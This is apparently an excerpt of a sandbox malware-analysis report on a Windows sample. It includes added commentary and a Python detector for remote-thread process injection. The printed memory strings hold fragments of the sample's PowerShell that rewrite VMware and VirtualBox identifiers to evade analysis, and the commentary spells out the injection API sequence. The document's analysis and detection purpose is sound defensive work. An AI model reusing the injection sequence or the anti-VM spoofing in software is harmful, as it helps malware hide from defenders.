                Source: C:\Users\user\Desktop\r8k29DBraE.exe Process information set: NOOPENFILEERRORBOX (39 events)
                Source: C:\Users\user\Desktop\wzcsapi.exe Process information set: NOOPENFILEERRORBOX (59 events)
                Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX (16 events)
                Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (10 events)
                Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX (55 events)
                Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX (2 events)

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\wzcsvc.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 4_2_00007FF6B5AD10C0
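The call chain above is the whole injector in one function: it opens a candidate process, reads its image name, queries the token's integrity level (GetTokenInformation followed by GetSidSubAuthority on the last sub-authority is how the integrity RID is read), and then allocates, writes and starts a thread in the target with VirtualAllocEx, WriteProcessMemory and NtCreateThreadEx. The script below is an added example, not from the report or the sample: it turns such a "Code function:" chain into an API list and matches ordered API sequences against it, so the same logic can run over any API trace. The pattern table is an assumption of what counts as injection; the only input is the chain quoted from the report.

```python
import re
from typing import Dict, List, Sequence

# Ordered API sequences to hunt for. Each step is a set of interchangeable calls,
# and unrelated calls may appear between steps. These patterns are an assumption,
# not a Joe Sandbox rule.
PATTERNS: Dict[str, List[set]] = {
    "remote-thread-injection": [
        {"OpenProcess", "NtOpenProcess"},
        {"VirtualAllocEx", "NtAllocateVirtualMemory"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"NtCreateThreadEx", "CreateRemoteThread", "RtlCreateUserThread"},
    ],
    "integrity-level-check": [
        {"OpenProcessToken", "NtOpenProcessToken"},
        {"GetTokenInformation", "NtQueryInformationToken"},
        {"GetSidSubAuthority"},
    ],
}

# Chain copied from the report's wzcsvc.exe entry, trailing function id included.
REPORT_CHAIN = (
    "OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,"
    "CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,"
    "GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,"
    "LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,"
    "WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,4_2_00007FF6B5AD10C0"
)

FUNCTION_ID = re.compile(r"\d+_\d+_[0-9A-Fa-f]+")


def parse_report_chain(chain: str) -> List[str]:
    """Split a 'Code function:' chain into API names, dropping the trailing
    sandbox function id (e.g. 4_2_00007FF6B5AD10C0)."""
    names = [tok.strip() for tok in chain.split(",") if tok.strip()]
    return [n for n in names if not FUNCTION_ID.fullmatch(n)]


def match_sequence(trace: Sequence[str], pattern: Sequence[set]) -> List[int]:
    """Return the trace index of the first call satisfying each step, in order, or []
    if some step never occurs after the previous one."""
    hits: List[int] = []
    pos = 0
    for step in pattern:
        while pos < len(trace) and trace[pos] not in step:
            pos += 1
        if pos == len(trace):
            return []
        hits.append(pos)
        pos += 1
    return hits


def classify(trace: Sequence[str]) -> Dict[str, List[int]]:
    """Map every matching pattern name to the indices where its steps were found."""
    result = {}
    for name, pattern in PATTERNS.items():
        hits = match_sequence(trace, pattern)
        if hits:
            result[name] = hits
    return result


if __name__ == "__main__":
    apis = parse_report_chain(REPORT_CHAIN)
    for name, hits in classify(apis).items():
        print(name, [apis[i] for i in hits])
```

The ordering requirement is what keeps the false-positive rate tolerable: debuggers and inventory tools call OpenProcess and GetTokenInformation constantly, but they do not follow them with a write into the target and a new thread. Because the report also lists "Found direct / indirect Syscall", a trace built from user-mode API hooks can miss the Nt* variants, which is why each step accepts the native call as an alternative.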
                Source: C:\Users\user\Desktop\r8k29DBraE.exe Memory allocated: 2616CD70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\r8k29DBraE.exe Memory allocated: 2616EB60000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\wzcsapi.exe Memory allocated: C10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\wzcsapi.exe Memory allocated: 1A8C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\wzcsapi.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\wzcsapi.exe Window / User API: threadDelayed 7635
                Source: C:\Users\user\Desktop\wzcsapi.exe Window / User API: threadDelayed 2142
                Source: C:\Users\user\Desktop\wzcsvc.exe Window / User API: threadDelayed 1767
                Source: C:\Users\user\Desktop\wzcsvc.exe Window / User API: threadDelayed 475
                Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 8359
                Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 1640
                Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 8352
                Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 1584
                Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9875
                Source: C:\Windows\System32\lsass.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_9-16308
                Source: C:\Users\user\Desktop\r8k29DBraE.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_1-18658
                Source: C:\Windows\System32\WerFault.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_8-8133
                Source: C:\Windows\System32\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_5-15720
                Source: C:\Users\user\Desktop\wzcsvc.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_4-8418
                Source: C:\Users\user\Desktop\r8k29DBraE.exe API coverage: 9.9 %
                Source: C:\Windows\System32\svchost.exe API coverage: 5.0 %
                Source: C:\Windows\System32\WerFault.exe API coverage: 5.7 %
                Source: C:\Windows\System32\lsass.exe API coverage: 6.3 %
                Source: C:\Windows\System32\svchost.exe API coverage: 5.0 %
                Source: C:\Windows\System32\svchost.exe API coverage: 5.7 %
                Source: C:\Windows\System32\svchost.exe API coverage: 6.5 %
                Source: C:\Windows\System32\svchost.exe API coverage: 4.7 %
                Source: C:\Windows\System32\svchost.exe API coverage: 6.4 %
                Source: C:\Windows\System32\svchost.exe API coverage: 7.3 %
                Source: C:\Windows\System32\svchost.exe API coverage: 4.9 %
                Source: C:\Windows\System32\svchost.exe API coverage: 6.1 %
                Source: C:\Windows\System32\svchost.exe API coverage: 4.7 %
                Source: C:\Windows\System32\svchost.exe API coverage: 5.0 %
                Source: C:\Users\user\Desktop\wzcsapi.exe TID: 7520 Thread sleep time: -34126476536362649s >= -30000s
                Source: C:\Users\user\Desktop\wzcsvc.exe TID: 6500 Thread sleep count: 1767 > 30
                Source: C:\Users\user\Desktop\wzcsvc.exe TID: 6500 Thread sleep time: -176700s >= -30000s
                Source: C:\Users\user\Desktop\wzcsvc.exe TID: 3308 Thread sleep count: 475 > 30
                Source: C:\Users\user\Desktop\wzcsvc.exe TID: 3308 Thread sleep time: -47500s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7364 Thread sleep count: 63 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7364 Thread sleep time: -63000s >= -30000s
                Source: C:\Windows\System32\winlogon.exe TID: 7204 Thread sleep count: 8359 > 30
                Source: C:\Windows\System32\winlogon.exe TID: 7204 Thread sleep time: -8359000s >= -30000s
                Source: C:\Windows\System32\winlogon.exe TID: 7204 Thread sleep count: 1640 > 30
                Source: C:\Windows\System32\winlogon.exe TID: 7204 Thread sleep time: -1640000s >= -30000s
                Source: C:\Windows\System32\lsass.exe TID: 7216 Thread sleep count: 8352 > 30
                Source: C:\Windows\System32\lsass.exe TID: 7216 Thread sleep time: -8352000s >= -30000s
                Source: C:\Windows\System32\lsass.exe TID: 7216 Thread sleep count: 1584 > 30
                Source: C:\Windows\System32\lsass.exe TID: 7216 Thread sleep time: -1584000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7368 Thread sleep count: 245 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7368 Thread sleep time: -245000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7344 Thread sleep count: 58 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7344 Thread sleep time: -58000s >= -30000s
                Source: C:\Windows\System32\dwm.exe TID: 7452 Thread sleep count: 9875 > 30
                Source: C:\Windows\System32\dwm.exe TID: 7452 Thread sleep time: -9875000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 2872 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7964 Thread sleep count: 57 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7964 Thread sleep time: -57000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7484 Thread sleep count: 256 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7484 Thread sleep time: -256000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7508 Thread sleep count: 259 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7508 Thread sleep time: -259000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7540 Thread sleep count: 162 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7540 Thread sleep time: -162000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7548 Thread sleep count: 256 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7548 Thread sleep time: -256000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7560 Thread sleep count: 181 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7560 Thread sleep time: -181000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7568 Thread sleep count: 256 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7568 Thread sleep time: -256000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7576 Thread sleep count: 97 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7576 Thread sleep time: -97000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7592 Thread sleep count: 77 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7592 Thread sleep time: -77000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7600 Thread sleep count: 82 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7600 Thread sleep time: -82000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7608 Thread sleep count: 258 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7608 Thread sleep time: -258000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7680 Thread sleep count: 258 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7680 Thread sleep time: -258000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7332Thread sleep count: 63 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7332Thread sleep time: -63000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7688Thread sleep count: 241 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7688Thread sleep time: -241000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7696Thread sleep count: 85 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7696Thread sleep time: -85000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7720Thread sleep count: 80 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7720Thread sleep time: -80000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7756Thread sleep count: 256 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7756Thread sleep time: -256000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7796Thread sleep count: 249 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7796Thread sleep time: -249000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7804Thread sleep count: 257 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7804Thread sleep time: -257000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7816Thread sleep count: 258 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7816Thread sleep time: -258000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7840Thread sleep count: 34 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7840Thread sleep time: -34000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7860Thread sleep count: 256 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7860Thread sleep time: -256000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7880Thread sleep count: 225 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7880Thread sleep time: -225000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7888Thread sleep count: 67 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7888Thread sleep time: -67000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7900Thread sleep count: 66 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7900Thread sleep time: -66000s >= -30000s
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\wzcsvc.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\wzcsvc.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\wzcsapi.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\wzcsapi.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\wzcsapi.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\wzcsapi.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\wzcsapi.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\wzcsapi.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\wzcsapi.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\wzcsapi.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\wzcsapi.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F59E250 FindFirstFileExW,1_2_000002616F59E250
                Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00000216819BE250 FindFirstFileExW,5_2_00000216819BE250
                Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1EE250 FindFirstFileExW,6_2_000001CA7D1EE250
                Source: C:\Windows\System32\WerFault.exe | Code function: 8_2_00000265B3C0E250 FindFirstFileExW,8_2_00000265B3C0E250
                Source: C:\Windows\System32\lsass.exe | Code function: 9_2_0000017D2DD5E250 FindFirstFileExW,9_2_0000017D2DD5E250
                Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000022F4B92E250 FindFirstFileExW,10_2_0000022F4B92E250
                Source: C:\Windows\System32\svchost.exe | Code function: 11_2_0000013DE272E250 FindFirstFileExW,11_2_0000013DE272E250
                Source: C:\Windows\System32\dwm.exe | Code function: 14_2_00000262F1CAE250 FindFirstFileExW,14_2_00000262F1CAE250
                Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000002234E15E250 FindFirstFileExW,15_2_000002234E15E250
                Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000023942B1E250 FindFirstFileExW,16_2_0000023942B1E250
                Source: C:\Windows\System32\svchost.exe | Code function: 17_2_000001EF056DE250 FindFirstFileExW,17_2_000001EF056DE250
                Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000002287AD7E250 FindFirstFileExW,18_2_000002287AD7E250
                Source: C:\Windows\System32\svchost.exe | Code function: 19_2_000001B94DA9E250 FindFirstFileExW,19_2_000001B94DA9E250
                Source: C:\Windows\System32\svchost.exe | Code function: 20_2_000002520257E250 FindFirstFileExW,20_2_000002520257E250
                Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001A9EBFCE250 FindFirstFileExW,21_2_000001A9EBFCE250
                Source: C:\Windows\System32\svchost.exe | Code function: 22_2_0000019FF163E250 FindFirstFileExW,22_2_0000019FF163E250
                Source: C:\Users\user\Desktop\wzcsapi.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\svchost.exe | Thread delayed: delay time: 30000
                Source: Amcache.hve.8.dr | Binary or memory string: VMware
                Source: svchost.exe, 00000017.00000002.2647565274.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1441428085.000002A769A42000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
                Source: svchost.exe, 00000017.00000000.1441428085.000002A769A42000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@vmci
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.dr | Binary or memory string: VMware SATA CD00
                Source: Amcache.hve.8.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: svchost.exe, 00000012.00000000.1419840527.000002287A02B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.dr | Binary or memory string: NECVMWarVMware SATA CD00
                Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.23.dr | Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                Source: dwm.exe, 0000000E.00000002.2698819352.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: dRomNECVMWarVMware_SATA_
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.dr | Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                Source: WerFault.exe, 00000008.00000003.1585065018.00000265B459F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000008.00000003.1582411351.00000265B459F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000008.00000002.1587550148.00000265B459F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2645232189.0000013DE18BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2638457854.0000013DE182B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2688680497.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2691628090.000002234B50C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: svchost.exe, 0000000F.00000000.1408194310.000002234AE93000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                Source: svchost.exe, 00000017.00000000.1441998504.000002A76A110000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
                Source: Microsoft-Windows-Partition%4Diagnostic.evtx.23.dr | Binary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                Source: Amcache.hve.8.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.23.dr | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.23.dr | Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.dr | Binary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
                Source: dwm.exe, 0000000E.00000002.2698819352.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: System.evtx.23.dr | Binary or memory string: VMCI: Using capabilities (0x1c).
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                Source: Amcache.hve.8.dr | Binary or memory string: vmci.sys
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.dr | Binary or memory string: nonicNECVMWarVMware SATA CD00
                Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.23.dr | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                Source: svchost.exe, 00000017.00000002.2671284175.000002A76A489000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmcir:m
                Source: Amcache.hve.8.dr | Binary or memory string: VMware20,1
                Source: Amcache.hve.8.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.8.dr | Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.dr | Binary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
                Source: Amcache.hve.8.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.8.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.8.dr | Binary or memory string: VMware PCI VMCI Bus Device
                Source: svchost.exe, 00000017.00000002.2695585202.000002A76C0B6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: dowvmci
                Source: Microsoft-Windows-Ntfs%4Operational.evtx.23.dr | Binary or memory string: VMware
                Source: Amcache.hve.8.dr | Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.8.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                Source: Amcache.hve.8.dr | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                Source: Amcache.hve.8.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual USB Mouse
                Source: lsass.exe, 00000009.00000003.1482822792.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicvssNT SERVICE
                Source: Amcache.hve.8.dr | Binary or memory string: vmci.syshbin
                Source: Amcache.hve.8.dr | Binary or memory string: VMware, Inc.
                Source: Amcache.hve.8.dr | Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.8.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.8.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.8.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.23.dr | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
